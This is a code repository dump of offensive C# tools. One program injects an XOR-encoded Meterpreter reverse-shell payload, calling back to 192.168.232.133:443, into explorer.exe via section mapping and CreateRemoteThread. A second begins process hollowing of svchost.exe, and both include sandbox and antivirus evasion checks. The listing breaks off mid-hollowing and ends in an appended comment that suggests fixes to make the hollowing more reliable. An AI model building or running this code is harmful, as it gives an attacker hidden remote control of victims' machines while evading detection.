VisualStudioVersion = 16.0.30804.86
MinimumVisualStudioVersion = 10.0.40219.1
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "ROT Shellcode Encoder", "ROT Shellcode Encoder.csproj", "{59224C16-39C5-49EA-8525-F493DC1D66FE}"
EndProject
Global
	GlobalSection(SolutionConfigurationPlatforms) = preSolution
		Debug|Any CPU = Debug|Any CPU
		Release|Any CPU = Release|Any CPU
	EndGlobalSection
	GlobalSection(ProjectConfigurationPlatforms) = postSolution
		{59224C16-39C5-49EA-8525-F493DC1D66FE}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
		{59224C16-39C5-49EA-8525-F493DC1D66FE}.Debug|Any CPU.Build.0 = Debug|Any CPU
		{59224C16-39C5-49EA-8525-F493DC1D66FE}.Release|Any CPU.ActiveCfg = Release|Any CPU
		{59224C16-39C5-49EA-8525-F493DC1D66FE}.Release|Any CPU.Build.0 = Release|Any CPU
	EndGlobalSection
	GlobalSection(SolutionProperties) = preSolution
		HideSolutionNode = FALSE
	EndGlobalSection
	GlobalSection(ExtensibilityGlobals) = postSolution
		SolutionGuid = {F6755004-5FA9-4677-BBB7-D8446DC21ED4}
	EndGlobalSection
EndGlobal
--------------------------------------------------------------------------------
/Sections Shellcode Process Injector/App.config:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/Sections Shellcode Process Injector/Program.cs:
--------------------------------------------------------------------------------
using System;
using System.Diagnostics;
using System.Linq;
using System.Runtime.InteropServices;

namespace RemoteShinjectLowlevel
{
    class Program
    {
        // FOR DEBUGGING
        [DllImport("kernel32.dll")]
        static extern bool ReadProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, [Out] byte[] lpBuffer, int dwSize, out IntPtr lpNumberOfBytesRead);

        [DllImport("msvcrt.dll", CallingConvention = CallingConvention.Cdecl)]
        static extern int memcmp(byte[] b1, byte[] b2, long count);

        static bool ByteArrayCompare(byte[] b1, byte[] b2)
        {
            return b1.Length == b2.Length
                && memcmp(b1, b2, b1.Length) == 0;
        }
        // END DEBUGGING

        public const uint ProcessAllFlags = 0x001F0FFF;
        public const uint GenericAll = 0x10000000;
        public const uint PageReadWrite = 0x04;
        public const uint PageReadExecute = 0x20;
        public const uint PageReadWriteExecute = 0x40;
        public const uint SecCommit = 0x08000000;

        [DllImport("kernel32.dll", SetLastError = true)]
        public static extern IntPtr OpenProcess(uint processAccess, bool bInheritHandle, int processId);


        [DllImport("ntdll.dll", SetLastError = true)]
        static extern UInt32 NtCreateSection(ref IntPtr SectionHandle, UInt32 DesiredAccess, IntPtr ObjectAttributes, ref UInt32 MaximumSize,
            UInt32 SectionPageProtection, UInt32 AllocationAttributes, IntPtr FileHandle);

        [DllImport("ntdll.dll", SetLastError = true)]
        static extern uint NtMapViewOfSection(IntPtr SectionHandle, IntPtr ProcessHandle, ref IntPtr BaseAddress, IntPtr ZeroBits, IntPtr CommitSize,
            out ulong SectionOffset, out uint ViewSize, uint InheritDisposition, uint AllocationType, uint Win32Protect);

        [DllImport("ntdll.dll", SetLastError = true)]
        static extern uint NtUnmapViewOfSection(IntPtr hProc, IntPtr baseAddr);

        [DllImport("ntdll.dll", ExactSpelling = true, SetLastError = false)]
        static extern int NtClose(IntPtr hObject);

        [DllImport("kernel32.dll")]
        static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);

        [System.Runtime.InteropServices.DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
        static extern IntPtr VirtualAllocExNuma(IntPtr hProcess, IntPtr lpAddress, uint dwSize, UInt32 flAllocationType, UInt32 flProtect, UInt32 nndPreferred);

        [System.Runtime.InteropServices.DllImport("kernel32.dll")]
        static extern IntPtr GetCurrentProcess();

        static void Main(string[] args)
        {
            // Sandbox evasion
            IntPtr mem = VirtualAllocExNuma(GetCurrentProcess(), IntPtr.Zero, 0x1000, 0x3000, 0x4, 0);
            if (mem == null)
            {
                return;
            }

            // msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.232.133 LPORT=443 EXITFUNC=thread -f csharp
            // XORed with key 0xfa
            byte[] buf = new byte[511] {
                0x06, 0xb2, 0x79, 0x1e, 0x0a, 0x12, 0x36, 0xfa, 0xfa, 0xfa, 0xbb, 0xab, 0xbb, 0xaa, 0xa8,
                0xab, 0xac, 0xb2, 0xcb, 0x28, 0x9f, 0xb2, 0x71, 0xa8, 0x9a, 0xb2, 0x71, 0xa8, 0xe2, 0xb2,
                0x71, 0xa8, 0xda, 0xb7, 0xcb, 0x33, 0xb2, 0x71, 0x88, 0xaa, 0xb2, 0xf5, 0x4d, 0xb0, 0xb0,
                0xb2, 0xcb, 0x3a, 0x56, 0xc6, 0x9b, 0x86, 0xf8, 0xd6, 0xda, 0xbb, 0x3b, 0x33, 0xf7, 0xbb,
                0xfb, 0x3b, 0x18, 0x17, 0xa8, 0xbb, 0xab, 0xb2, 0x71, 0xa8, 0xda, 0x71, 0xb8, 0xc6, 0xb2,
                0xfb, 0x2a, 0x9c, 0x7b, 0x82, 0xe2, 0xf1, 0xf8, 0xf5, 0x7f, 0x88, 0xfa, 0xfa, 0xfa, 0x71,
                0x7a, 0x72, 0xfa, 0xfa, 0xfa, 0xb2, 0x7f, 0x3a, 0x8e, 0x9d, 0xb2, 0xfb, 0x2a, 0x71, 0xb2,
                0xe2, 0xaa, 0xbe, 0x71, 0xba, 0xda, 0xb3, 0xfb, 0x2a, 0x19, 0xac, 0xb7, 0xcb, 0x33, 0xb2,
                0x05, 0x33, 0xbb, 0x71, 0xce, 0x72, 0xb2, 0xfb, 0x2c, 0xb2, 0xcb, 0x3a, 0xbb, 0x3b, 0x33,
                0xf7, 0x56, 0xbb, 0xfb, 0x3b, 0xc2, 0x1a, 0x8f, 0x0b, 0xb6, 0xf9, 0xb6, 0xde, 0xf2, 0xbf,
                0xc3, 0x2b, 0x8f, 0x22, 0xa2, 0xbe, 0x71, 0xba, 0xde, 0xb3, 0xfb, 0x2a, 0x9c, 0xbb, 0x71,
                0xf6, 0xb2, 0xbe, 0x71, 0xba, 0xe6, 0xb3, 0xfb, 0x2a, 0xbb, 0x71, 0xfe, 0x72, 0xbb, 0xa2,
                0xbb, 0xa2, 0xa4, 0xa3, 0xb2, 0xfb, 0x2a, 0xa0, 0xbb, 0xa2, 0xbb, 0xa3, 0xbb, 0xa0, 0xb2,
                0x79, 0x16, 0xda, 0xbb, 0xa8, 0x05, 0x1a, 0xa2, 0xbb, 0xa3, 0xa0, 0xb2, 0x71, 0xe8, 0x13,
                0xb1, 0x05, 0x05, 0x05, 0xa7, 0xb3, 0x44, 0x8d, 0x89, 0xc8, 0xa5, 0xc9, 0xc8, 0xfa, 0xfa,
                0xbb, 0xac, 0xb3, 0x73, 0x1c, 0xb2, 0x7b, 0x16, 0x5a, 0xfb, 0xfa, 0xfa, 0xb3, 0x73, 0x1f,
                0xb3, 0x46, 0xf8, 0xfa, 0xfb, 0x41, 0x3a, 0x52, 0x12, 0x7f, 0xbb, 0xae, 0xb3, 0x73, 0x1e,
                0xb6, 0x73, 0x0b, 0xbb, 0x40, 0xb6, 0x8d, 0xdc, 0xfd, 0x05, 0x2f, 0xb6, 0x73, 0x10, 0x92,
                0xfb, 0xfb, 0xfa, 0xfa, 0xa3, 0xbb, 0x40, 0xd3, 0x7a, 0x91, 0xfa, 0x05, 0x2f, 0x90, 0xf0,
                0xbb, 0xa4, 0xaa, 0xaa, 0xb7, 0xcb, 0x33, 0xb7, 0xcb, 0x3a, 0xb2, 0x05, 0x3a, 0xb2, 0x73,
                0x38, 0xb2, 0x05, 0x3a, 0xb2, 0x73, 0x3b, 0xbb, 0x40, 0x10, 0xf5, 0x25, 0x1a, 0x05, 0x2f,
                0xb2, 0x73, 0x3d, 0x90, 0xea, 0xbb, 0xa2, 0xb6, 0x73, 0x18, 0xb2, 0x73, 0x03, 0xbb, 0x40,
                0x63, 0x5f, 0x8e, 0x9b, 0x05, 0x2f, 0x7f, 0x3a, 0x8e, 0xf0, 0xb3, 0x05, 0x34, 0x8f, 0x1f,
                0x12, 0x69, 0xfa, 0xfa, 0xfa, 0xb2, 0x79, 0x16, 0xea, 0xb2, 0x73, 0x18, 0xb7, 0xcb, 0x33,
                0x90, 0xfe, 0xbb, 0xa2, 0xb2, 0x73, 0x03, 0xbb, 0x40, 0xf8, 0x23, 0x32, 0xa5, 0x05, 0x2f,
                0x79, 0x02, 0xfa, 0x84, 0xaf, 0xb2, 0x79, 0x3e, 0xda, 0xa4, 0x73, 0x0c, 0x90, 0xba, 0xbb,
                0xa3, 0x92, 0xfa, 0xea, 0xfa, 0xfa, 0xbb, 0xa2, 0xb2, 0x73, 0x08, 0xb2, 0xcb, 0x33, 0xbb,
                0x40, 0xa2, 0x5e, 0xa9, 0x1f, 0x05, 0x2f, 0xb2, 0x73, 0x39, 0xb3, 0x73, 0x3d, 0xb7, 0xcb,
                0x33, 0xb3, 0x73, 0x0a, 0xb2, 0x73, 0x20, 0xb2, 0x73, 0x03, 0xbb, 0x40, 0xf8, 0x23, 0x32,
                0xa5, 0x05, 0x2f, 0x79, 0x02, 0xfa, 0x87, 0xd2, 0xa2, 0xbb, 0xad, 0xa3, 0x92, 0xfa, 0xba,
                0xfa, 0xfa, 0xbb, 0xa2, 0x90, 0xfa, 0xa0, 0xbb, 0x40, 0xf1, 0xd5, 0xf5, 0xca, 0x05, 0x2f,
                0xad, 0xa3, 0xbb, 0x40, 0x8f, 0x94, 0xb7, 0x9b, 0x05, 0x2f, 0xb3, 0x05, 0x34, 0x13, 0xc6,
                0x05, 0x05, 0x05, 0xb2, 0xfb, 0x39, 0xb2, 0xd3, 0x3c, 0xb2, 0x7f, 0x0c, 0x8f, 0x4e, 0xbb,
                0x05, 0x1d, 0xa2, 0x90, 0xfa, 0xa3, 0x41, 0x1a, 0xe7, 0xd0, 0xf0, 0xbb, 0x73, 0x20, 0x05,
                0x2f
            };

            int len = buf.Length;
            uint uLen = (uint)len;

            // Get a handle on the local process
            IntPtr lHandle = Process.GetCurrentProcess().Handle;
            Console.WriteLine($"Got handle {lHandle} on local process.");

            // Grab the right PID
            string targetedProc = "explorer"; //change :)
            int procId = Process.GetProcessesByName(targetedProc).First().Id;

            // Get a handle on the remote process
            IntPtr pHandle = OpenProcess(ProcessAllFlags, false, procId);
            Console.WriteLine($"Got handle {pHandle} on PID {procId} ({targetedProc}).");

            // Create a RWX memory section with the size of the payload using 'NtCreateSection'
            IntPtr sHandle = new IntPtr();
            long cStatus = NtCreateSection(ref sHandle, GenericAll, IntPtr.Zero, ref uLen, PageReadWriteExecute, SecCommit, IntPtr.Zero);
            Console.WriteLine($"Created new shared memory section with handle {sHandle}. Success: {cStatus == 0}.");

            // Map a view of the created section (sHandle) for the LOCAL process using 'NtMapViewOfSection'
            IntPtr baseAddrL = new IntPtr();
            uint viewSizeL = uLen;
            ulong sectionOffsetL = new ulong();
            long mStatusL = NtMapViewOfSection(sHandle, lHandle, ref baseAddrL, IntPtr.Zero, IntPtr.Zero, out sectionOffsetL, out viewSizeL, 2, 0, PageReadWrite);
            Console.WriteLine($"Mapped local memory section with base address {baseAddrL} (viewsize: {viewSizeL}, offset: {sectionOffsetL}). Success: {mStatusL == 0}.");

            // Map a view of the same section for the specified REMOTE process (pHandle) using 'NtMapViewOfSection'
            IntPtr baseAddrR = new IntPtr();
            uint viewSizeR = uLen;
            ulong sectionOffsetR = new ulong();
            long mStatusR = NtMapViewOfSection(sHandle, pHandle, ref baseAddrR, IntPtr.Zero, IntPtr.Zero, out sectionOffsetR, out viewSizeR, 2, 0, PageReadExecute);
            Console.WriteLine($"Mapped remote memory section with base address {baseAddrR} (viewsize: {viewSizeR}, offset: {sectionOffsetR}). Success: {mStatusR == 0}.");

            // Decode shellcode
            for (int i = 0; i < buf.Length; i++)
            {
                buf[i] = (byte)((uint)buf[i] ^ 0xfa);
            }

            // Copy shellcode to locally mapped view, which will be reflected in the remote mapping
            Marshal.Copy(buf, 0, baseAddrL, len);
            Console.WriteLine($"Copied shellcode to locally mapped memory at address {baseAddrL}.");

            // DEBUG: Read memory at remote address and verify it's the same as the intended shellcode
            byte[] remoteMemory = new byte[len];
            IntPtr noBytesRead = new IntPtr();
            bool result = ReadProcessMemory(pHandle, baseAddrR, remoteMemory, remoteMemory.Length, out noBytesRead);
            bool sameSame = ByteArrayCompare(buf, remoteMemory);
            Console.WriteLine($"DEBUG: Checking if shellcode is correctly placed remotely...");
            if (sameSame != true)
            {
                Console.WriteLine("DEBUG: NOT THE SAME! ABORTING EXECUTION.");
                return;
            }
            else
            {
                Console.WriteLine("DEBUG: OK.");
            }
            // END DEBUG

            // Execute the remotely mapped memory using 'CreateRemoteThread' (EWWW high-level APIs!!!)
            if (CreateRemoteThread(pHandle, IntPtr.Zero, 0, baseAddrR, IntPtr.Zero, 0, IntPtr.Zero) != IntPtr.Zero)
            {
                Console.WriteLine("Injection done! Check your listener!");
            }
            else
            {
                Console.WriteLine("Injection failed!");
            }

            // Unmap the locally mapped section view using 'NtUnmapViewOfSection'
            uint uStatusL = NtUnmapViewOfSection(lHandle, baseAddrL);
            Console.WriteLine($"Unmapped local memory section. Success: {uStatusL == 0}.");

            // Close the section
            int clStatus = NtClose(sHandle);
            Console.WriteLine($"Closed memory section. Success: {clStatus == 0}.");
        }
    }
}
--------------------------------------------------------------------------------
/Sections Shellcode Process Injector/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;

// General Information about an assembly is controlled through the following
// set of attributes. Change these attribute values to modify the information
// associated with an assembly.
[assembly: AssemblyTitle("Sections Shellcode Process Injector")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("Sections Shellcode Process Injector")]
[assembly: AssemblyCopyright("Copyright © 2021")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]

// Setting ComVisible to false makes the types in this assembly not visible
// to COM components. If you need to access a type in this assembly from
// COM, set the ComVisible attribute to true on that type.
[assembly: ComVisible(false)]

// The following GUID is for the ID of the typelib if this project is exposed to COM
[assembly: Guid("08dbc2bf-e9f3-4ae4-b0cc-6e9c8767982d")]

// Version information for an assembly consists of the following four values:
//
//      Major Version
//      Minor Version
//      Build Number
//      Revision
//
// You can specify all the values or you can default the Build and Revision Numbers
// by using the '*' as shown below:
// [assembly: AssemblyVersion("1.0.*")]
[assembly: AssemblyVersion("1.0.0.0")]
[assembly: AssemblyFileVersion("1.0.0.0")]
--------------------------------------------------------------------------------
/Sections Shellcode Process Injector/Sections Shellcode Process Injector.csproj:
--------------------------------------------------------------------------------
Debug
AnyCPU
{08DBC2BF-E9F3-4AE4-B0CC-6E9C8767982D}
Exe
Sections_Shellcode_Process_Injector
Sections Shellcode Process Injector
v4.7.2
512
true
true

AnyCPU
true
full
false
bin\Debug\
DEBUG;TRACE
prompt
4

AnyCPU
pdbonly
true
bin\Release\
TRACE
prompt
4

true
bin\x64\Debug\
DEBUG;TRACE
full
x64
7.3
prompt
true

bin\x64\Release\
TRACE
true
pdbonly
x64
7.3
prompt
true
--------------------------------------------------------------------------------
/Sections Shellcode Process Injector/Sections Shellcode Process Injector.sln:
--------------------------------------------------------------------------------
Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Version 16
VisualStudioVersion = 16.0.30804.86
MinimumVisualStudioVersion = 10.0.40219.1
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Sections Shellcode Process Injector", "Sections Shellcode Process Injector.csproj", "{08DBC2BF-E9F3-4AE4-B0CC-6E9C8767982D}"
EndProject
Global
	GlobalSection(SolutionConfigurationPlatforms) = preSolution
		Debug|Any CPU = Debug|Any CPU
		Debug|x64 = Debug|x64
		Release|Any CPU = Release|Any CPU
		Release|x64 = Release|x64
	EndGlobalSection
	GlobalSection(ProjectConfigurationPlatforms) = postSolution
		{08DBC2BF-E9F3-4AE4-B0CC-6E9C8767982D}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
		{08DBC2BF-E9F3-4AE4-B0CC-6E9C8767982D}.Debug|Any CPU.Build.0 = Debug|Any CPU
		{08DBC2BF-E9F3-4AE4-B0CC-6E9C8767982D}.Debug|x64.ActiveCfg = Debug|x64
		{08DBC2BF-E9F3-4AE4-B0CC-6E9C8767982D}.Debug|x64.Build.0 = Debug|x64
		{08DBC2BF-E9F3-4AE4-B0CC-6E9C8767982D}.Release|Any CPU.ActiveCfg = Release|Any CPU
		{08DBC2BF-E9F3-4AE4-B0CC-6E9C8767982D}.Release|Any CPU.Build.0 = Release|Any CPU
		{08DBC2BF-E9F3-4AE4-B0CC-6E9C8767982D}.Release|x64.ActiveCfg = Release|x64
		{08DBC2BF-E9F3-4AE4-B0CC-6E9C8767982D}.Release|x64.Build.0 = Release|x64
	EndGlobalSection
	GlobalSection(SolutionProperties) = preSolution
		HideSolutionNode = FALSE
	EndGlobalSection
	GlobalSection(ExtensibilityGlobals) = postSolution
		SolutionGuid = {48768DED-4F3D-43B9-8D5A-3771A7C4278E}
	EndGlobalSection
EndGlobal
--------------------------------------------------------------------------------
/Shellcode Process Hollowing/App.config:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/Shellcode Process Hollowing/Program.cs:
--------------------------------------------------------------------------------
using System;
using System.Runtime.InteropServices;

namespace ProcessHollowing
{
    public class Program
    {
        public const uint CREATE_SUSPENDED = 0x4;
        public const int PROCESSBASICINFORMATION = 0;

        [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Auto)]
        public struct ProcessInfo
        {
            public IntPtr hProcess;
            public IntPtr hThread;
            public Int32 ProcessId;
            public Int32 ThreadId;
        }

        [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Auto)]
        public struct StartupInfo
        {
            public uint cb;
            public string lpReserved;
            public string lpDesktop;
            public string lpTitle;
            public uint dwX;
            public uint dwY;
            public uint dwXSize;
            public uint dwYSize;
            public uint dwXCountChars;
            public uint dwYCountChars;
            public uint dwFillAttribute;
            public uint dwFlags;
            public short wShowWindow;
            public short cbReserved2;
            public IntPtr lpReserved2;
            public IntPtr hStdInput;
            public IntPtr hStdOutput;
            public IntPtr hStdError;
        }

        [StructLayout(LayoutKind.Sequential)]
        internal struct ProcessBasicInfo
        {
            public IntPtr Reserved1;
            public IntPtr PebAddress;
            public IntPtr Reserved2;
            public IntPtr Reserved3;
            public IntPtr UniquePid;
            public IntPtr MoreReserved;
        }

        [DllImport("kernel32.dll")]
        static extern void Sleep(uint dwMilliseconds);

        [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Ansi)]
        static extern bool CreateProcess(string lpApplicationName, string lpCommandLine, IntPtr lpProcessAttributes,
            IntPtr lpThreadAttributes, bool bInheritHandles, uint dwCreationFlags, IntPtr lpEnvironment, string lpCurrentDirectory,
            [In] ref StartupInfo lpStartupInfo, out ProcessInfo lpProcessInformation);

        [DllImport("ntdll.dll", CallingConvention = CallingConvention.StdCall)]
        private static extern int ZwQueryInformationProcess(IntPtr hProcess, int procInformationClass,
            ref ProcessBasicInfo procInformation, uint ProcInfoLen, ref uint retlen);

        [DllImport("kernel32.dll", SetLastError = true)]
        static extern bool ReadProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, [Out] byte[] lpBuffer,
            int dwSize, out IntPtr lpNumberOfbytesRW);

        [DllImport("kernel32.dll", SetLastError = true)]
        public static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, Int32 nSize, out IntPtr lpNumberOfBytesWritten);

        [DllImport("kernel32.dll", SetLastError = true)]
        static extern uint ResumeThread(IntPtr hThread);

        public static void Main(string[] args)
        {
            // AV evasion: Sleep for 10s and detect if time really passed
            DateTime t1 = DateTime.Now;
            Sleep(10000);
            double deltaT = DateTime.Now.Subtract(t1).TotalSeconds;
            if (deltaT < 9.5)
            {
                return;
            }

            // msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.232.133 LPORT=443 EXITFUNC=thread -f csharp
            // XORed with key 0xfa
            byte[] buf = new byte[511] {
                0x06, 0xb2, 0x79, 0x1e, 0x0a, 0x12, 0x36, 0xfa, 0xfa, 0xfa, 0xbb, 0xab, 0xbb, 0xaa, 0xa8,
                0xab, 0xac, 0xb2, 0xcb, 0x28, 0x9f, 0xb2, 0x71, 0xa8, 0x9a, 0xb2, 0x71, 0xa8, 0xe2, 0xb2,
                0x71, 0xa8, 0xda, 0xb7, 0xcb, 0x33, 0xb2, 0x71, 0x88, 0xaa, 0xb2, 0xf5, 0x4d, 0xb0, 0xb0,
                0xb2, 0xcb, 0x3a, 0x56, 0xc6, 0x9b, 0x86, 0xf8, 0xd6, 0xda, 0xbb, 0x3b, 0x33, 0xf7, 0xbb,
                0xfb, 0x3b, 0x18, 0x17, 0xa8, 0xbb, 0xab, 0xb2, 0x71, 0xa8, 0xda, 0x71, 0xb8, 0xc6, 0xb2,
                0xfb, 0x2a, 0x9c, 0x7b, 0x82, 0xe2, 0xf1, 0xf8, 0xf5, 0x7f, 0x88, 0xfa, 0xfa, 0xfa, 0x71,
                0x7a, 0x72, 0xfa, 0xfa, 0xfa, 0xb2, 0x7f, 0x3a, 0x8e, 0x9d, 0xb2, 0xfb, 0x2a, 0x71, 0xb2,
                0xe2, 0xaa, 0xbe, 0x71, 0xba, 0xda, 0xb3, 0xfb, 0x2a, 0x19, 0xac, 0xb7, 0xcb, 0x33, 0xb2,
                0x05, 0x33, 0xbb, 0x71, 0xce, 0x72, 0xb2, 0xfb, 0x2c, 0xb2, 0xcb, 0x3a, 0xbb, 0x3b, 0x33,
                0xf7, 0x56, 0xbb, 0xfb, 0x3b, 0xc2, 0x1a, 0x8f, 0x0b, 0xb6, 0xf9, 0xb6, 0xde, 0xf2, 0xbf,
                0xc3, 0x2b, 0x8f, 0x22, 0xa2, 0xbe, 0x71, 0xba, 0xde, 0xb3, 0xfb, 0x2a, 0x9c, 0xbb, 0x71,
                0xf6, 0xb2, 0xbe, 0x71, 0xba, 0xe6, 0xb3, 0xfb, 0x2a, 0xbb, 0x71, 0xfe, 0x72, 0xbb, 0xa2,
                0xbb, 0xa2, 0xa4, 0xa3, 0xb2, 0xfb, 0x2a, 0xa0, 0xbb, 0xa2, 0xbb, 0xa3, 0xbb, 0xa0, 0xb2,
                0x79, 0x16, 0xda, 0xbb, 0xa8, 0x05, 0x1a, 0xa2, 0xbb, 0xa3, 0xa0, 0xb2, 0x71, 0xe8, 0x13,
                0xb1, 0x05, 0x05, 0x05, 0xa7, 0xb3, 0x44, 0x8d, 0x89, 0xc8, 0xa5, 0xc9, 0xc8, 0xfa, 0xfa,
                0xbb, 0xac, 0xb3, 0x73, 0x1c, 0xb2, 0x7b, 0x16, 0x5a, 0xfb, 0xfa, 0xfa, 0xb3, 0x73, 0x1f,
                0xb3, 0x46, 0xf8, 0xfa, 0xfb, 0x41, 0x3a, 0x52, 0x12, 0x7f, 0xbb, 0xae, 0xb3, 0x73, 0x1e,
                0xb6, 0x73, 0x0b, 0xbb, 0x40, 0xb6, 0x8d, 0xdc, 0xfd, 0x05, 0x2f, 0xb6, 0x73, 0x10, 0x92,
                0xfb, 0xfb, 0xfa, 0xfa, 0xa3, 0xbb, 0x40, 0xd3, 0x7a, 0x91, 0xfa, 0x05, 0x2f, 0x90, 0xf0,
                0xbb, 0xa4, 0xaa, 0xaa, 0xb7, 0xcb, 0x33, 0xb7, 0xcb, 0x3a, 0xb2, 0x05, 0x3a, 0xb2, 0x73,
                0x38, 0xb2, 0x05, 0x3a, 0xb2, 0x73, 0x3b, 0xbb, 0x40, 0x10, 0xf5, 0x25, 0x1a, 0x05, 0x2f,
                0xb2, 0x73, 0x3d, 0x90, 0xea, 0xbb, 0xa2, 0xb6, 0x73, 0x18, 0xb2, 0x73, 0x03, 0xbb, 0x40,
                0x63, 0x5f, 0x8e, 0x9b, 0x05, 0x2f, 0x7f, 0x3a, 0x8e, 0xf0, 0xb3, 0x05, 0x34, 0x8f, 0x1f,
                0x12, 0x69, 0xfa, 0xfa, 0xfa, 0xb2, 0x79, 0x16, 0xea, 0xb2, 0x73, 0x18, 0xb7, 0xcb, 0x33,
                0x90, 0xfe, 0xbb, 0xa2, 0xb2, 0x73, 0x03, 0xbb, 0x40, 0xf8, 0x23, 0x32, 0xa5, 0x05, 0x2f,
                0x79, 0x02, 0xfa, 0x84, 0xaf, 0xb2, 0x79, 0x3e, 0xda, 0xa4, 0x73, 0x0c, 0x90, 0xba, 0xbb,
                0xa3, 0x92, 0xfa, 0xea, 0xfa, 0xfa, 0xbb, 0xa2, 0xb2, 0x73, 0x08, 0xb2, 0xcb, 0x33, 0xbb,
                0x40, 0xa2, 0x5e, 0xa9, 0x1f, 0x05, 0x2f, 0xb2, 0x73, 0x39, 0xb3, 0x73, 0x3d, 0xb7, 0xcb,
                0x33, 0xb3, 0x73, 0x0a, 0xb2, 0x73, 0x20, 0xb2, 0x73, 0x03, 0xbb, 0x40, 0xf8, 0x23, 0x32,
                0xa5, 0x05, 0x2f, 0x79, 0x02, 0xfa, 0x87, 0xd2, 0xa2, 0xbb, 0xad, 0xa3, 0x92, 0xfa, 0xba,
                0xfa, 0xfa, 0xbb, 0xa2, 0x90, 0xfa, 0xa0, 0xbb, 0x40, 0xf1, 0xd5, 0xf5, 0xca, 0x05, 0x2f,
                0xad, 0xa3, 0xbb, 0x40, 0x8f, 0x94, 0xb7, 0x9b, 0x05, 0x2f, 0xb3, 0x05, 0x34, 0x13, 0xc6,
                0x05, 0x05, 0x05, 0xb2, 0xfb, 0x39, 0xb2, 0xd3, 0x3c, 0xb2, 0x7f, 0x0c, 0x8f, 0x4e, 0xbb,
                0x05, 0x1d, 0xa2, 0x90, 0xfa, 0xa3, 0x41, 0x1a, 0xe7, 0xd0, 0xf0, 0xbb, 0x73, 0x20, 0x05,
                0x2f
            };

            // Start 'svchost.exe' in a suspended state
            StartupInfo sInfo = new StartupInfo();
            ProcessInfo pInfo = new ProcessInfo();
            bool cResult = CreateProcess(null, "c:\\windows\\system32\\svchost.exe", IntPtr.Zero, IntPtr.Zero,
                false, CREATE_SUSPENDED, IntPtr.Zero, null, ref sInfo, out pInfo);
            Console.WriteLine($"Started 'svchost.exe' in a suspended state with PID {pInfo.ProcessId}. Success: {cResult}.");

            // Get the Process Environment Block (PEB) address of the suspended process; the pointer to the image base is stored at offset 0x10 in the PEB
            ProcessBasicInfo pbInfo = new ProcessBasicInfo();
            uint retLen = new uint();
            long qResult = ZwQueryInformationProcess(pInfo.hProcess, PROCESSBASICINFORMATION, ref pbInfo, (uint)(IntPtr.Size * 6), ref retLen);
            IntPtr baseImageAddr = (IntPtr)((Int64)pbInfo.PebAddress + 0x10);
            Console.WriteLine($"Got process information and located PEB address of process at {"0x" + baseImageAddr.ToString("x")}. Success: {qResult == 0}.");

            // Get entry point of the actual process executable
            // This one is a bit complicated, because this address differs for each process (due to Address Space Layout Randomization (ASLR))
            // From the PEB (address we got in last call), we have to do the following:
            // 1. Read executable address from first 8 bytes (Int64, offset 0) of PEB and read data chunk for further processing
            // 2. Read the field 'e_lfanew', 4 bytes at offset 0x3C from executable address to get the offset for the PE header
            // 3. Take the memory at this PE header add an offset of 0x28 to get the Entrypoint Relative Virtual Address (RVA) offset
            // 4. 
Read the value at the RVA offset address to get the offset of the executable entrypoint from the executable address 148 | // 5. Get the absolute address of the entrypoint by adding this value to the base executable address. Success! 149 | 150 | // 1. Read executable address from first 8 bytes (Int64, offset 0) of PEB and read data chunk for further processing 151 | byte[] procAddr = new byte[0x8]; 152 | byte[] dataBuf = new byte[0x200]; 153 | IntPtr bytesRW = new IntPtr(); 154 | bool result = ReadProcessMemory(pInfo.hProcess, baseImageAddr, procAddr, procAddr.Length, out bytesRW); 155 | IntPtr executableAddress = (IntPtr)BitConverter.ToInt64(procAddr, 0); 156 | result = ReadProcessMemory(pInfo.hProcess, executableAddress, dataBuf, dataBuf.Length, out bytesRW); 157 | Console.WriteLine($"DEBUG: Executable base address: {"0x" + executableAddress.ToString("x")}."); 158 | 159 | // 2. Read the field 'e_lfanew', 4 bytes (UInt32) at offset 0x3C from executable address to get the offset for the PE header 160 | uint e_lfanew = BitConverter.ToUInt32(dataBuf, 0x3c); 161 | Console.WriteLine($"DEBUG: e_lfanew offset: {"0x" + e_lfanew.ToString("x")}."); 162 | 163 | // 3. Take the memory at this PE header add an offset of 0x28 to get the Entrypoint Relative Virtual Address (RVA) offset 164 | uint rvaOffset = e_lfanew + 0x28; 165 | Console.WriteLine($"DEBUG: RVA offset: {"0x" + rvaOffset.ToString("x")}."); 166 | 167 | // 4. Read the 4 bytes (UInt32) at the RVA offset to get the offset of the executable entrypoint from the executable address 168 | uint rva = BitConverter.ToUInt32(dataBuf, (int)rvaOffset); 169 | Console.WriteLine($"DEBUG: RVA value: {"0x" + rva.ToString("x")}."); 170 | 171 | // 5. Get the absolute address of the entrypoint by adding this value to the base executable address. Success! 
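            // Added sanity check (example code, not part of the original project): the walk above trusts whatever
            // ReadProcessMemory handed back. If either read failed, dataBuf is all zeros, e_lfanew and rva are 0,
            // and step 5 would turn the image base itself into the "entry point", so the payload would be written
            // over the PE headers. Validate the three magics before step 5: IMAGE_DOS_HEADER.e_magic ("MZ"),
            // IMAGE_NT_HEADERS.Signature ("PE\0\0") at e_lfanew, and IMAGE_OPTIONAL_HEADER.Magic at e_lfanew+0x18,
            // which must be 0x20b (PE32+) because the 8-byte PEB+0x10 read and the x64 payload only fit a 64-bit target.
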